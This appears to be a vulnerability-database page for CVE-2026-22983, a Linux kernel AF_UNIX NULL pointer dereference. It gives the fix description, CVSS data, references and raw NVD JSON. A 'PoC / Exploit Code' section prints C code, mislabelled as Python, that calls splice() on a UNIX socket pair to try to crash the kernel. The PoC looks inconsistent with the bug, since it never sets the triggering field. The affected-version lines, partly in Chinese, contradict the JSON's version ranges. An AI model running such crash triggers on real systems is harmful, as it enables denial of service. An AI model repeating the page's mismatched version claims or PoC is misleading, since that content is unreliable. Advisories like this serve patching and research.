CVE-2026-22983

Description

In the Linux kernel, the following vulnerability has been resolved: net: do not write to msg_get_inq in callee NULL pointer dereference fix. msg_get_inq is an input field from caller to callee. Don't set it in the callee, as the caller may not clear it on struct reuse. This is a kernel-internal variant of msghdr only, and the only user does reinitialize the field. So this is not critical for that reason. But it is more robust to avoid the write, and slightly simpler code. And it fixes a bug, see below. Callers set msg_get_inq to request the input queue length to be returned in msg_inq. This is equivalent to but independent from the SO_INQ request to return that same info as a cmsg (tp->recvmsg_inq). To reduce branching in the hot path the second also sets the msg_inq. That is WAI. This is a fix to commit 4d1442979e4a ("af_unix: don't post cmsg for SO_INQ unless explicitly asked for"), which fixed the inverse. Also avoid NULL pointer dereference in unix_stream_read_generic if state->msg is NULL and msg->msg_get_inq is written. A NULL state->msg can happen when splicing as of commit 2b514574f7e8 ("net: af_unix: implement splice for stream af_unix sockets"). Also collapse two branches using a bitwise or.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:linux:linux_kernel:6.19:rc4:*:*:*:*:*:* - VULNERABLE

Linux Kernel < 5.15 (包含引入splice的版本)

Linux Kernel < 6.1 (特定受影响的版本需查看git.kernel.org提交7d11e047eda5f98514ae62507065ac961981c025和ffa2be496ef65055b28b39c6bd9a7d66943ee89a)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2026-22983 PoC - NULL Pointer Dereference in AF_UNIX splice
// This PoC demonstrates triggering the NULL pointer dereference
// by performing splice operations on AF_UNIX sockets

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>

#define BUFFER_SIZE 1024

int main() {
    int pipefd[2];
    int sv[2];
    char buffer[BUFFER_SIZE];
    ssize_t bytes;
    
    // Create AF_UNIX socket pair
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) < 0) {
        perror("socketpair(AF_UNIX)");
        return 1;
    }
    
    // Create pipe for splice
    if (pipe(pipefd) < 0) {
        perror("pipe");
        return 1;
    }
    
    // Fork child process to write data
    if (fork() == 0) {
        close(sv[0]);
        sleep(1);
        write(sv[1], "test data", 9);
        close(sv[1]);
        exit(0);
    }
    
    close(sv[1]);
    
    // Trigger splice operation that may lead to NULL pointer dereference
    // when msg_get_inq is set and state->msg becomes NULL
    bytes = splice(sv[0], NULL, pipefd[1], NULL, BUFFER_SIZE, SPLICE_F_MOVE);
    
    if (bytes < 0) {
        perror("splice");
    } else {
        printf("Spliced %zd bytes\n", bytes);
    }
    
    close(sv[0]);
    close(pipefd[0]);
    close(pipefd[1]);
    
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-22983
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-22983
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-22983/
[4] VulDB https://vuldb.com/cve/CVE-2026-22983
[5] https://git.kernel.org/stable/c/7d11e047eda5f98514ae62507065ac961981c025
[6] https://git.kernel.org/stable/c/ffa2be496ef65055b28b39c6bd9a7d66943ee89a

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-22983", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-23T16:15:54.333", "lastModified": "2026-02-26T18:48:36.020", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: do not write to msg_get_inq in callee\n\nNULL pointer dereference fix.\n\nmsg_get_inq is an input field from caller to callee. Don't set it in\nthe callee, as the caller may not clear it on struct reuse.\n\nThis is a kernel-internal variant of msghdr only, and the only user\ndoes reinitialize the field. So this is not critical for that reason.\nBut it is more robust to avoid the write, and slightly simpler code.\nAnd it fixes a bug, see below.\n\nCallers set msg_get_inq to request the input queue length to be\nreturned in msg_inq. This is equivalent to but independent from the\nSO_INQ request to return that same info as a cmsg (tp->recvmsg_inq).\nTo reduce branching in the hot path the second also sets the msg_inq.\nThat is WAI.\n\nThis is a fix to commit 4d1442979e4a (\"af_unix: don't post cmsg for\nSO_INQ unless explicitly asked for\"), which fixed the inverse.\n\nAlso avoid NULL pointer dereference in unix_stream_read_generic if\nstate->msg is NULL and msg->msg_get_inq is written. A NULL state->msg\ncan happen when splicing as of commit 2b514574f7e8 (\"net: af_unix:\nimplement splice for stream af_unix sockets\").\n\nAlso collapse two branches using a bitwise or."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nnet: no escribir en msg_get_inq en el callee\n\nCorrección de desreferencia de puntero NULL.\n\nmsg_get_inq es un campo de entrada del caller al callee. No lo establezca en el callee, ya que el caller podría no borrarlo al reutilizar la estructura.\n\nEsta es solo una variante interna del kernel de msghdr, y el único usuario reinicializa el campo. Por lo tanto, esto no es crítico por esa razón. Pero es más robusto evitar la escritura, y un código ligeramente más simple. Y corrige un error, ver abajo.\n\nLos callers establecen msg_get_inq para solicitar que la longitud de la cola de entrada sea devuelta en msg_inq. Esto es equivalente a, pero independiente de, la solicitud SO_INQ para devolver esa misma información como un cmsg (tp->recvmsg_inq). Para reducir las bifurcaciones en la ruta crítica, el segundo también establece el msg_inq. Eso es WAI.\n\nEsta es una corrección para el commit 4d1442979e4a ('af_unix: no publicar cmsg para SO_INQ a menos que se solicite explícitamente'), que corrigió lo inverso.\n\nTambién evitar la desreferencia de puntero NULL en unix_stream_read_generic si state->msg es NULL y se escribe msg->msg_get_inq. Un state->msg NULL puede ocurrir al hacer splicing a partir del commit 2b514574f7e8 ('net: af_unix: implementar splice para sockets af_unix de stream').\n\nTambién colapsar dos ramas usando un OR bit a bit."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.18.4", "versionEndExcluding": "6.18.6", "matchCriteriaId": "27849DC4-2BBE-4536-8F33-2616A53ACA55"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc4:*:*:*:*:*:*", "matchCriteriaId": "13580667-0A98-40CC-B29F-D12790B91BDB"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/7d11e047eda5f98514ae62507065ac961981c025", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ffa2be496ef65055b28b39c6bd9a7d66943ee89a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}